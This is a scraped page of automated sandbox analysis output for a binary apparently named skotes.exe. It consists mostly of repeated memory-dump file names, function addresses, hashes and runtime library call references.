Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: fc8f28540b8bd939f53d18d54a61ded9ccf9cc0ed3f8f508bce877d67fed2adc
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 2401D632600554A7CF16EE558841AEF7BA9DF46354F100055FD22AB292DA71EF41B6A0

Function 00C09510 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00C09519

Part of subcall function 00BFF4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00C05486

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00C0953D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00C09550
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00C09559

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction ID: 9b86d2348745742aa05f8ada89534c23b4a3a075a69e9f903ae6bd70962ca87c
Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
Instruction Fuzzy Hash: 6FF0A030600A205EE662ABA99C12F6A23D4DF41715F00C51EE56B972C3CE74E986EB81

Function 00C1DFE3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

Strings

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 00C1DFE8

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1726044199
Opcode ID: c9a60ca6d2277d82f26eb712b2cc468ce131db0609015b0328afd9bd229460c4
Instruction ID: cb0ea6c353862d4a9b7349d77df1eeaf208bcb77cc83ffd393f2e178431f5cb1
Opcode Fuzzy Hash: c9a60ca6d2277d82f26eb712b2cc468ce131db0609015b0328afd9bd229460c4
Instruction Fuzzy Hash: 9E21C271604219AFDB30AE658C80EEB73ADAF473647104615FD28C6241E771EDC0B7A1

Function 00C11704 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 00C11764
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C117AF

Strings

pContext, xrefs: 00C117A7

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 1aba6a7d104b4d9c6a605fb91b24086d5e9f2b705e9587f1c6c49e5d9931c0bb
Instruction ID: 83d3ed6c5e0346e177a10d515315f59fc5cfcda1bbc352985b6ad9ee55fbe365
Opcode Fuzzy Hash: 1aba6a7d104b4d9c6a605fb91b24086d5e9f2b705e9587f1c6c49e5d9931c0bb
Instruction Fuzzy Hash: C2112936A102149BCB15FF28C4846ED77A5AF86360B1D4065EE12E73C1DB38DE81EBD0

Function 00C0B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 00C0B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C0B961

Strings

pContext, xrefs: 00C0B959

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000E72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684145634.0000000000EAF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684228696.0000000000EDC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684252362.0000000000EDD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684279870.0000000000EDE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684300666.0000000000EE4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684326349.0000000000EE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685567728.0000000000EF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685629752.0000000000EF3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685676912.0000000000EF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2685709596.0000000000EF5000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_be0000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: f1a8d4ed55fe9b02ad12696445150744fdfa96a4ab23f8b7069691c772e86f1b
Instruction ID: 870b455e21932c9d7ac009b3af1cb251b731c73b8cdb0bd4c424deb55cfe59e6
Opcode Fuzzy Hash: f1a8d4ed55fe9b02ad12696445150744fdfa96a4ab23f8b7069691c772e86f1b
Instruction Fuzzy Hash: 23E0683AB00208ABCB00FB64E849C9EBBB89EC07107044025EA11E3380EF74EE45CBD0

Function 00C034CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C034FC

Strings

pScheduler, xrefs: 00C034F4
version, xrefs: 00C034E1

Memory Dump Source

Source File: 00000006.00000002.2680593860.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000006.00000002.2678989522.0000000000BE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680593860.0000000000C42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680755296.0000000000C49000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680797474.0000000000C4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2680822841.0000000000C57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681757009.0000000000DB1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681801830.0000000000DB3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681834666.0000000000DC5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681856278.0000000000DC7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DC8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681883007.0000000000DD0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681947828.0000000000DDB000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2681971967.0000000000DDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682002825.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682032299.0000000000DE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682056125.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682146225.0000000000DEB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682667892.0000000000E02000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2682717847.0000000000E03000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683732040.0000000000E0B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683784418.0000000000E19000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683811997.0000000000E2B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683848149.0000000000E2D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683876756.0000000000E2E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683898524.0000000000E34000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683921446.0000000000E42000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683943913.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683967721.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2683989544.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684012086.0000000000E57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684035267.0000000000E5F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684065002.0000000000E66000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684095310.0000000000E67000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2684120262.0000000000E70000.00000080.00000001.01000000.00000007.sdmpDownload File
